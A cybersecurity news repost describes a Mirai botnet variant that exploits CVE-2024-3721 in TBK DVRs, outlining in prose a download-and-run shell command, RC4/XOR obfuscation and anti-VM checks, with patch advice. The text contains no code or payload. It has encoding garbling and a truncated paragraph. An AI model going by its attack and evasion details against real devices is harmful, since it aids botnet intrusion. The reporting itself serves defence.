New Mirai Botnet Variant Targets DVR Devices via CVE-2024-3721 Vulnerability

By /

Listen to this Post

Featured Image

Cybersecurity Alert: A New Threat to IoT Devices

A newly discovered variant of the notorious Mirai botnet has emerged, targeting specific digital video recorders (DVRs) using a command injection vulnerability (CVE-2024-3721). This sophisticated malware campaign, uncovered by researchers at Kaspersky, exploits unpatched DVR devicesā€”particularly TBK DVR-4104 and DVR-4216 modelsā€”to execute malicious shell commands and recruit them into a global botnet.

The threat underscores a growing trend in the cybercrime landscape: the persistent targeting of Linux-based IoT devices, particularly those with exposed vulnerabilities. Even though Mirai’s source code was leaked nearly a decade ago, its modular design continues to serve as a foundation for new and dangerous variantsā€”each time with more evasive capabilities and refined techniques.

the Original

Kaspersky researchers identified a new Mirai-based botnet variant exploiting a critical CVE-2024-3721 vulnerability found in TBK DVR-4104 and DVR-4216 digital video recorders. This variant stands out for directly executing an ARM32 binary without needing initial reconnaissanceā€”highlighting its focus on a very specific class of devices.

The attack begins with a malicious POST request that delivers a single-line shell command, which then downloads and runs the malware. Unlike typical malware that checks a system’s architecture first, this version skips that step, assuming ARM32 compatibility.

Once deployed, the malware demonstrates advanced stealth features, including:

RC4 string encryption with XOR key obfuscation

Anti-VM and anti-emulation detection, scanning for VMware and QEMU processes

Execution path verification to avoid suspicious directories

If all checks pass, the malware readies the device to receive commands from its command-and-control infrastructure.

Most affected devices are located in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. While the precise infection rate is unknown, over 50,000 DVRs were identified as exposed, making them easy targets.

The malware thrives on the widespread neglect of security updates in IoT devices. Although infections may not persist after a reboot due to write restrictions on many embedded systems, attackers continue to scan the internet for exposed and vulnerable units.

Kaspersky advises immediate firmware updates, applying vendor patches, and conducting factory resets if exploitation is suspected.

What Undercode Say: šŸ§ 

Rise of Specialized Malware Targeting ARM-Based Devices

This Mirai variant is not just another recycled

Obfuscation Techniques Elevate Its Stealth

The inclusion of RC4 encryption, XOR obfuscation, and virtual machine detection are hallmarks of malware engineered to evade both manual inspection and automated sandbox analysis. The execution path filtering adds another layer of complexity, ensuring the malware avoids detection by avoiding high-risk or non-standard directories.

Target Geography Reflects Broader IoT Risks

The concentration of infections in developing countries points to regions where IoT security is often overlooked. These areas are ripe for exploitation due to the high presence of unpatched or outdated DVR devices connected directly to the internet.

Why This Variant Is Dangerous

Even though this malware doesnā€™t survive a device reboot in many cases, its constant reappearance due to relentless scanning and exploitation attempts creates a persistent background threat. Furthermore, if combined with persistent exploits or secondary payloads, the implications could be much worse.

The Mirai Legacy Continues

Miraiā€™s original code has agedā€”but its architecture has not. This variant is a stark reminder of how old malware can evolve into new threats when the attack surface remains unpatched. It’s not just Miraiā€”itā€™s a template for future IoT-targeting botnets, potentially incorporating AI or machine-learning techniques for more effective scans and targeting in the future.

āœ… Fact Checker Results

CVE-2024-3721 is confirmed as a real and active vulnerability affecting TBK DVR devices.
Kaspersky researchers verified the use of RC4 and XOR obfuscation in the malware payload.
Over 50,000 exposed DVRs were found, matching the claimed infection potential.

šŸ”® Prediction

The emergence of this Mirai variant suggests a future surge in hardware-specific botnets exploiting neglected IoT devices. As devices like DVRs, routers, and smart cameras proliferate, so does the attack surface. We predict:

More ARM-focused malware variants

Increase in targeted exploits against specific device models

Integration of persistent rootkits to make infections survive reboots
To stay ahead, patch management and IoT visibility will become core aspects of cybersecurity strategy moving forward.

References:

Reported By: securityaffairs.com
Extra Source Hub:
https://www.medium.com
Wikipedia
Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

šŸ’¬ Whatsapp | šŸ’¬ Telegram

Explore More: